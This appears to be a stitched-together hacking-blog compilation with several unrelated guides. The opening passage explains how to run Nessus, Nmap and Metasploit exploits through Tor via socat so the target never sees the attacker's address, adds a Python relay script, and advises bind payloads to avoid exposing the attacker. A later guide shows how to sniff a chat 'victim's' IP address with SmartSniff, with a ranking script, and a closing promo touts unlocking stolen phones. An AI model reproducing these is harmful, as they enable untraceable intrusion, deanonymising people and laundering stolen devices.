212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /scripts/fom/fom.cgi?cmd=&file=1&keywords=nessus HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:58 -0700] "GET /scripts/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:58 -0700] "GET /Album/ HTTP/1.1" 404 204 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:59 -0700] "GET /fom/fom.cgi?cmd=&file=1&keywords=nessus HTTP/1.1" 404 209 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:59 -0700] "GET /cgi-bin/wiki.pl? HTTP/1.1" 404 213 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
The 212.9.32.5 address is the Tor exit node, the last onion router in the random circuit Tor built; that is all the target's logs ever see.
Similarly, once you discover a vulnerability on a remote system, set up another socat instance. Say, for simplicity, you are exploiting a web server (port 80):
[talha@localhost#] ./socat TCP4-LISTEN:1234,fork SOCKS4:127.0.0.1:202.163.97.20:80,socksport=9050
In Metasploit, when launching the exploit, set the target IP (RHOST) to 127.0.0.1 and the remote port (RPORT) to 1234. It's that simple.
The same instructions can be used to exploit application flaws and anonymously execute arbitrary commands on vulnerable hosts. Bear in mind that only the exploit's forward connection goes through the relay: a reverse-connect payload would call back to your real address, so use a bind payload and reach it through another socat listener.

Some pieces of advice:
1. Nmap generates most of its probes through the raw packet interface, so those packets go directly to the target, not through Tor. A connect() scan (-sT) works with Tor, but a SYN scan (-sS), a UDP scan or anything else built on raw sockets talks to the target directly and reveals your true address.
2. Nmap and Nessus usually ping a target to see if it is up before port scanning. This is done with raw ICMP packets; ICMP does not traverse the Tor network (it is not TCP) and would reveal your true address. Disable the ping (nmap -Pn, or -P0 in older versions).
3. With socat's SOCKS4 address type, DNS is done on the client side: a target hostname is resolved from your machine, not through Tor. Give socat a literal IP, as above, or use its SOCKS4A address type, which passes the hostname to Tor for resolution.
In this setup the scanner itself never sees the target address: you point it at 127.0.0.1, so it has no hostname to resolve, and if you forget to turn off ICMP pings you end up pinging yourself rather than the target.
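
To show what socat is doing on the wire in the steps above, and why the SOCKS4 versus SOCKS4A choice in point 3 matters, here is an added example of a minimal Tor relay in Python. It is not from the original post and is not socat or Tor code: it builds the SOCKS4 CONNECT request that Tor's port 9050 expects, switches to the SOCKS4A form (destination 0.0.0.1 plus a trailing hostname) when given a name so that Tor does the resolution, and then pumps bytes between a loopback listener and the Tor circuit, which is what `socat TCP4-LISTEN:8080,fork SOCKS4:127.0.0.1:202.163.97.20:80,socksport=9050` does. The target 202.163.97.20 and ports are the ones used above. One caveat that applies to socat just as much: the loopback listener accepts the scanner's connection before the circuit is built, so a port scanner pointed at 127.0.0.1:8080 always sees that port as open whether or not the target's port is; the only signal it gets is an immediate close when Tor refuses the CONNECT.

```python
"""Minimal SOCKS4/SOCKS4A CONNECT client and loopback relay (added example, not socat or Tor code)."""
import socket
import struct
import sys
import threading

SOCKS_VERSION = 4
CMD_CONNECT = 1
REPLY_GRANTED = 0x5A                      # 0x5B..0x5D are the refusal codes
SOCKS4A_MARKER_IP = b"\x00\x00\x00\x01"   # 0.0.0.x (x != 0) tells the proxy "hostname follows"


def build_connect_request(host: str, port: int, userid: bytes = b"") -> bytes:
    """Build the SOCKS4 CONNECT request socat sends to Tor's port 9050.

    A dotted-quad host yields a plain SOCKS4 request. Anything else yields the
    SOCKS4A form (marker IP plus NUL-terminated hostname) so the proxy, i.e. Tor,
    resolves the name and this machine never issues a leaking DNS query.
    """
    try:
        dest_ip = socket.inet_pton(socket.AF_INET, host)
        hostname = b""
    except OSError:                       # not an IPv4 literal: use SOCKS4A
        dest_ip = SOCKS4A_MARKER_IP
        hostname = host.encode("idna") + b"\x00"
    return struct.pack("!BBH", SOCKS_VERSION, CMD_CONNECT, port) + dest_ip + userid + b"\x00" + hostname


def parse_connect_reply(reply: bytes) -> bool:
    """Parse the fixed 8-byte SOCKS4 reply; True when the proxy granted the CONNECT."""
    if len(reply) != 8:
        raise ValueError("SOCKS4 reply must be exactly 8 bytes")
    vn, status, _port, _ip = struct.unpack("!BBH4s", reply)
    if vn != 0:
        raise ValueError("SOCKS4 reply must start with a 0 byte")
    return status == REPLY_GRANTED


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection during the SOCKS handshake")
        buf += chunk
    return buf


def socks_connect(target_host: str, target_port: int, socks_addr=("127.0.0.1", 9050)) -> socket.socket:
    """Open a TCP connection to the target via the SOCKS4(A) proxy; return the connected socket."""
    upstream = socket.create_connection(socks_addr)
    try:
        upstream.sendall(build_connect_request(target_host, target_port))
        if not parse_connect_reply(_recv_exact(upstream, 8)):
            raise ConnectionError(f"SOCKS CONNECT to {target_host}:{target_port} refused by proxy")
    except Exception:
        upstream.close()
        raise
    return upstream


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way; on EOF half-close the destination so the other direction can drain."""
    try:
        while True:
            data = src.recv(65536)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _handle_client(client: socket.socket, target_host: str, target_port: int, socks_addr) -> None:
    try:
        upstream = socks_connect(target_host, target_port, socks_addr)
    except OSError:
        client.close()                    # same visible behaviour as socat: accepted, then closed
        return
    pumps = [threading.Thread(target=_pump, args=(client, upstream), daemon=True),
             threading.Thread(target=_pump, args=(upstream, client), daemon=True)]
    for t in pumps:
        t.start()
    for t in pumps:
        t.join()
    client.close()
    upstream.close()


def serve(local_port: int, target_host: str, target_port: int, socks_addr=("127.0.0.1", 9050)) -> None:
    """Equivalent of: socat TCP4-LISTEN:<local_port>,fork SOCKS4:127.0.0.1:<target>:<port>,socksport=9050"""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", local_port))      # loopback only: never expose the relay to the LAN
    listener.listen(16)
    while True:
        client, _ = listener.accept()
        threading.Thread(target=_handle_client, args=(client, target_host, target_port, socks_addr),
                         daemon=True).start()


if __name__ == "__main__":
    # python3 tor_relay.py 8080 202.163.97.20 80   then   nmap -sT -Pn -n -p 8080 127.0.0.1
    serve(int(sys.argv[1]), sys.argv[2], int(sys.argv[3]))
```

The relay only ever binds 127.0.0.1, and the scanner is run with -sT -Pn -n so it neither sends raw packets nor pings nor resolves anything. Passing a hostname instead of 202.163.97.20 exercises the SOCKS4A path; with plain SOCKS4 (what the socat lines above use) that name would have been looked up locally first.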

Staying anonymous

Tor cannot solve all anonymity problems. It focuses only on protecting the transport of data. You need to use protocol-specific support software if you do not want the sites you visit to see your identifying information. For example, you can use a web proxy such as Privoxy while browsing to block cookies and withhold information about your browser type.
Be clever. Don't provide your name or other revealing information in web forms. Be aware that, like all anonymizing networks that are fast enough for web browsing, Tor does not protect against end-to-end timing attacks: if your attacker can watch the traffic coming out of your computer and also the traffic arriving at your chosen destination, they can use statistical analysis to discover that the two are part of the same circuit.
The Electronic Privacy Information Center (EPIC) maintains a comprehensive list that serves as a sampling of the best available privacy-enhancing tools.

How to install Tor in BackTrack 4

So you've been checking out BackTrack 4 and you want to get your anonymity on? This assumes you have either installed BT4 to your hard drive or you are using the VMware version. You can do this on a LiveCD too, of course, but your changes won't persist unless you do some fancy lzm voodoo and burn a new copy of your CD.

First, you need to add the noreply.org repositories to your sources.list. These are the official Tor repositories for Debian-based Linux distributions. Open up a terminal and type:

Code:

nano /etc/apt/sources.list

At the bottom of this file, add these two lines:

Code:

deb http://mirror.noreply.org/pub/tor intrepid main
deb-src http://mirror.noreply.org/pub/tor intrepid main

Save the file. Now download the GPG key and check its fingerprint:

Code:

gpg --keyserver subkeys.pgp.net --recv 94C09C7F
gpg --fingerprint 94C09C7F

Compare the full fingerprint against this one before going any further; the 8-hex-digit key ID alone is not unique, and a keyserver can hand back a different key that shares it:

Code:

pub   1024D/94C09C7F 1999-11-10
      Key fingerprint = 5B00 C96D 5D54 AEE1 206B AF84 DE7A AF6E 94C0 9C7F
uid                  Peter Palfrader
uid                  Peter Palfrader
uid                  Peter Palfrader
uid                  Peter Palfrader
uid                  [jpeg image of size 7974]
sub   1024D/AFA44BDD 2003-07-09 [expires: 2010-07-18]
sub   2048g/E8F4A328 2003-07-09 [expires: 2010-07-18]

Then add it to your apt keyring:

Code:

gpg --export 94C09C7F | sudo apt-key add -
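
The fingerprint comparison above is done by eye; if you script the key import it is worth making the comparison strict, so that apt-key add only runs when exactly one key came back and its full 160-bit fingerprint matches. The Python below is an added example, not from the original post: it parses the output of gpg --fingerprint (the sample is constructed to match the listing above), normalizes the fingerprint, refuses to compare against a short key ID, and fails if the keyserver returned more than one key for 94C09C7F.

```python
"""Verify a fetched GPG key's full fingerprint before handing it to apt-key (added example)."""
import re
import sys

# Full fingerprint from the post. The short key ID 94C09C7F is only its last 32 bits.
EXPECTED_FPR = "5B00 C96D 5D54 AEE1 206B AF84 DE7A AF6E 94C0 9C7F"

# Constructed sample of `gpg --fingerprint 94C09C7F` output, shaped like the listing above.
SAMPLE_GPG_OUTPUT = """\
pub   1024D/94C09C7F 1999-11-10
      Key fingerprint = 5B00 C96D 5D54 AEE1 206B AF84 DE7A AF6E 94C0 9C7F
uid                  Peter Palfrader
sub   1024D/AFA44BDD 2003-07-09 [expires: 2010-07-18]
"""


def normalize(fpr: str) -> str:
    """Drop spaces/colons and upper-case so fingerprints compare byte-for-byte."""
    return re.sub(r"[^0-9a-fA-F]", "", fpr).upper()


def fingerprints_in(gpg_output: str) -> list:
    """Every 'Key fingerprint = ...' value in gpg output, normalized, one per key returned."""
    return [normalize(m) for m in re.findall(r"fingerprint\s*=\s*([0-9a-fA-F ]+)", gpg_output)]


def key_is_expected(gpg_output: str, expected: str = EXPECTED_FPR) -> bool:
    """True only if exactly one key came back and its full fingerprint matches `expected`."""
    want = normalize(expected)
    if len(want) != 40:
        raise ValueError("compare the full 40-hex-digit fingerprint, not a short key ID")
    found = fingerprints_in(gpg_output)
    return len(found) == 1 and found[0] == want


if __name__ == "__main__":
    # gpg --fingerprint 94C09C7F | python3 check_key.py && gpg --export 94C09C7F | apt-key add -
    sys.exit(0 if key_is_expected(sys.stdin.read()) else 1)
```

The script exits non-zero on any mismatch, so the && chain in the usage line never reaches apt-key add with the wrong key.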

Now update your sources and install Tor and Privoxy.

Code:

apt-get update
apt-get install tor privoxy

When this is done you will need to change a couple of Privoxy settings. In a terminal, edit the Privoxy config file:

Code:

nano /etc/privoxy/config

Add this line at the top. The / is the URL pattern (everything), and the trailing period means "no further HTTP proxy after the SOCKS hop", so do not leave it out:

Code:

forward-socks4a / 127.0.0.1:9050 .

Now we need to disable logging. Find the line "logfile logfile" and add a # at the beginning to comment it out (you can search a file in nano with Ctrl-W). You may also want to search for the line "jarfile jarfile" and make sure it is commented out too, although it already was for me. Now exit nano and restart the Privoxy service:

Code:

/etc/init.d/privoxy restart

Now head on over to the Torbutton Firefox add-on page, install Torbutton, and restart Firefox.

Now head over to the Tor detection page. It should tell you that you are not using Tor. Click the Tor button in the bottom right corner of Firefox, accept the sad fact that you might leak time zone data, and then press Enter in the address bar to reload the page. Note that you can't just hit refresh, because you need to make sure Firefox opens a new socket to check.torproject.org. If all is well, you will see the bright green notice "Congratulations. You are using Tor."

How to find IP addresses from Skype, Yahoo and MSN (updated)

The program we will be using today is called SmartSniff; the download link is at the bottom. SmartSniff is a network packet analyzer: it monitors all the incoming and outgoing data passing through your wired or wireless network card. With a P2P-capable IM client you will typically see two remote IPs: one for the instant-messaging provider's server, and the other will be theirs. Pulling someone's IP straight from TeamViewer is also very easy.

Open up all the programs you need. I have Xfire, PuTTY and SmartSniff open and ready to go.

After that, log in (or, if you are already logged in, select the victim you want to pull the IP from), open a chat, and do what this example shows:

Example:
You:Hello
Them:Hey
You:f
You:f
You:f
You:f
You:f
You:f
You:f
You:f
You:f
You:f
All you do is spam, but remember you must click the green Play button in SmartSniff before you do, so that it captures the data/packets; the picture below will help you understand.

Once you have their IP you can look up its approximate location.

If you are using Skype or AIM I suggest going into a call with them, because the packet rate increases rapidly and you will be able to pull their IP really quickly :) A call only helps if it is set up peer-to-peer; a relayed call shows you the relay's address, not theirs.
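
The post's method is to watch the capture by eye and pick out whichever remote address is not the provider's server. As an added example (not from the post and not SmartSniff code), the Python below does that triage over a constructed packet list: it discards your own address, private/loopback/multicast ranges and any networks you know belong to the IM provider, then ranks the remaining remote endpoints by bytes exchanged, optionally restricted to the time window of your message burst or call. All addresses are documentation ranges, not real hosts. The same caveat as above applies: if the provider relays the session instead of connecting the two clients directly, the top endpoint is the relay, and a result is only meaningful when the traffic really is peer-to-peer.

```python
"""Rank remote endpoints in a capture to separate a P2P peer from the provider's servers (added example)."""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Ranges that can never be the other party's public address.
NON_PEER_NETWORKS = [ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12",
    "192.168.0.0/16", "224.0.0.0/4", "255.255.255.255/32")]

# Constructed sample, not a real capture: (timestamp_s, src, dst, length_bytes).
LOCAL_IP = "192.168.1.10"
IM_SERVER_NETS = ("203.0.113.0/24",)          # pretend the IM provider's servers live here
SAMPLE_PACKETS = [
    (0.0, LOCAL_IP, "203.0.113.5", 120),       # login/presence exchange with the provider
    (0.2, "203.0.113.5", LOCAL_IP, 80),
    (1.0, LOCAL_IP, "198.51.100.77", 900),     # direct P2P traffic during the chat/call burst
    (1.1, "198.51.100.77", LOCAL_IP, 950),
    (1.2, LOCAL_IP, "198.51.100.77", 880),
    (1.3, "192.168.1.1", LOCAL_IP, 60),        # gateway chatter on the LAN: excluded
    (1.5, "192.0.2.9", LOCAL_IP, 40),          # unrelated background connection
    (1.6, "192.0.2.9", "192.0.2.10", 500),     # not ours at all (promiscuous capture): ignored
]


def is_candidate(ip: str, local_ip: str, server_networks) -> bool:
    """A remote address that could plausibly be the other party's own host."""
    addr = ip_address(ip)
    if addr == ip_address(local_ip) or any(addr in net for net in NON_PEER_NETWORKS):
        return False
    return not any(addr in net for net in server_networks)


def rank_peers(packets, local_ip: str, server_networks=(), window=None) -> list:
    """Return [(ip, total_bytes, packet_count)] for candidate remote endpoints, most traffic first.

    window is an optional (start, end) in capture seconds, e.g. the span of your spam burst.
    """
    nets = [ip_network(n) for n in server_networks]
    totals = defaultdict(lambda: [0, 0])
    for ts, src, dst, length in packets:
        if window is not None and not (window[0] <= ts <= window[1]):
            continue
        if local_ip not in (src, dst):         # traffic between other hosts is not this conversation
            continue
        remote = dst if src == local_ip else src
        if not is_candidate(remote, local_ip, nets):
            continue
        totals[remote][0] += length
        totals[remote][1] += 1
    return sorted(((ip, b, c) for ip, (b, c) in totals.items()), key=lambda t: t[1], reverse=True)


if __name__ == "__main__":
    for ip, nbytes, npkts in rank_peers(SAMPLE_PACKETS, LOCAL_IP, IM_SERVER_NETS, window=(0.9, 1.6)):
        print(f"{ip:<16} {nbytes:>6} bytes {npkts:>3} packets")
```

Feeding it a real capture means exporting SmartSniff's (or any sniffer's) connection list to the same four-tuple shape; the ranking logic does not change.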

Download: SmartSniff

How to fix "Partition not found" / GRUB error, or remove Ubuntu

Okay, I know some people are going to have a cow because I'm posting this. But the truth is, there are a lot of people trying Ubuntu alongside Windows 7. People who have attempted to remove Ubuntu without deleting all of its partitions are left with this GRUB error. A friend of mine recently ran into it and asked for my help; it is a common problem, so I am posting a solution on how to fix it.

So, for all of you who have a dual-boot system and are looking to remove Ubuntu for now, here are some tips. NEVER NEVER NEVER just remove the Ubuntu partitions: you won't be able to boot Windows, because the GRUB code in your master boot record points at files on those partitions and they will be gone. Instead, follow these easy steps:

(1) Boot your Windows installation
(2) Click on this link: Get MbrFix
(3) Download the program, unzip it and copy it to your root folder (I'll assume C:\)
(4) Open a command prompt in Windows by going to Start / Accessories / Command Prompt
(5) Type:
cd \ and press "Enter"
mbrfix /drive 0 fixmbr /yes and press "Enter"

*PLEASE NOTE* The above assumes your boot device is drive 0; if you are not sure, please post for help. If you have the Windows 7 installation DVD, the same repair can be done without a third-party tool: boot the DVD, choose "Repair your computer", open the command prompt and run bootrec /fixmbr.

(6) Close the command prompt window


*PLEASE NOTE* The following assumes you want to get rid of your Ubuntu partitions and resize your Windows partition(s) to take up that space. If you do not wish to do so, you can stop now.

(7) Put your Ubuntu LiveCD back in the CD drive and reboot your PC so that the Ubuntu desktop comes up
(8) On the Ubuntu desktop, look at the top menu bar and go to Applications / Accessories / Terminal
(9) When the terminal window comes up, type:
sudo gparted and press "Enter"

This brings up the partition editor. You want to:

(a) delete all non-Windows partitions
(b) resize your Windows partition to be larger (optional; you may want to leave this alone so you can come back and try Ubuntu again!)

(10) When you have finished deleting the Ubuntu partitions, just restart your PC, removing the CD from the drive before it boots again.

If everything went correctly, your PC should boot straight into Windows. Note that on the first boot of Windows after you have changed the disk (especially if you resized the Windows partition), Windows may run chkdsk; this is normal and should be fine.

If you have already deleted your Linux partitions and are getting GRUB errors, please try the following, as suggested by this user (thanks for the neat addition!):

Quoted from forum user Bothered, replying to "HowTo: Remove Ubuntu (& Restore Windows)":

If you delete the Ubuntu partitions without running mbrfix then you can use the Ubuntu LiveCD to restore the master boot record by:

1. Booting from the Ubuntu LiveCD
2. Enabling the universe repositories: launch System->Administration->Software Sources and check "Community maintained Open Source software (universe)"
3. Installing the "ms-sys" package: click Applications->Accessories->Terminal and type "sudo apt-get update" and then "sudo apt-get install ms-sys".
4. Finally restoring the Windows master boot record by entering the command "ms-sys -w /dev/[drive]", where [drive] is the hard disk whose Windows master boot record you want to restore. You can find out which this is by launching gparted (System->Administration->GNOME Partition Editor) and cycling through the available drives until you find your Windows partition

- - - - -

Hope this helps, and please let me know if anyone finds any errors. Also, for anyone using this post, "we" really hope you will come back to Ubuntu someday! Linux, and Ubuntu, will be waiting!

============================

Troubleshooting:

If, after following this guide, you cannot boot into Windows, you may need to boot a live CD and manually delete the Ubuntu partition (leaving it as unpartitioned space, adding it to the Windows partition, or formatting it as FAT/NTFS). You also need to be sure the MBR is set up for Windows; search the forums for more help on that. In addition, the following Microsoft articles may be of help:

How to factory unlock your iPhone right from your home

Break The Lock: Recently I came across a website where you can factory unlock any iPhone permanently, right from your home. I factory unlocked my iPhone 5, locked to AT&T, in just 6 hours.


Why unlock your iPhone, and what difference will it make?

  • After unlocking you can use your iPhone with any GSM carrier in the world, meaning you can switch to whichever carrier best suits your needs.
  • Unlike software or hardware unlocks, this won't void your warranty.
  • It's safe and fast: you just order the unlock, then restore your iPhone from iTunes to get it unlocked. As simple as that.
  • You can increase the resale value of your iPhone.
  • You can even unlock blacklisted, stolen or insurance-claimed phones; they will work normally, like a factory-unlocked phone, after unlocking.
What models are supported?

The big thing is that you can unlock almost all iPhone models from 40 countries and 500 different carriers around the world. Breakthelock.com supports all basebands and firmware versions.

Unlike software unlocks or jailbreaks, this is a permanent solution: you only need to unlock it once and your iPhone will stay unlocked forever. You can update iOS, sync with iTunes and change SIM cards whenever you like without fear of it ever relocking. Unlock your iPhone now.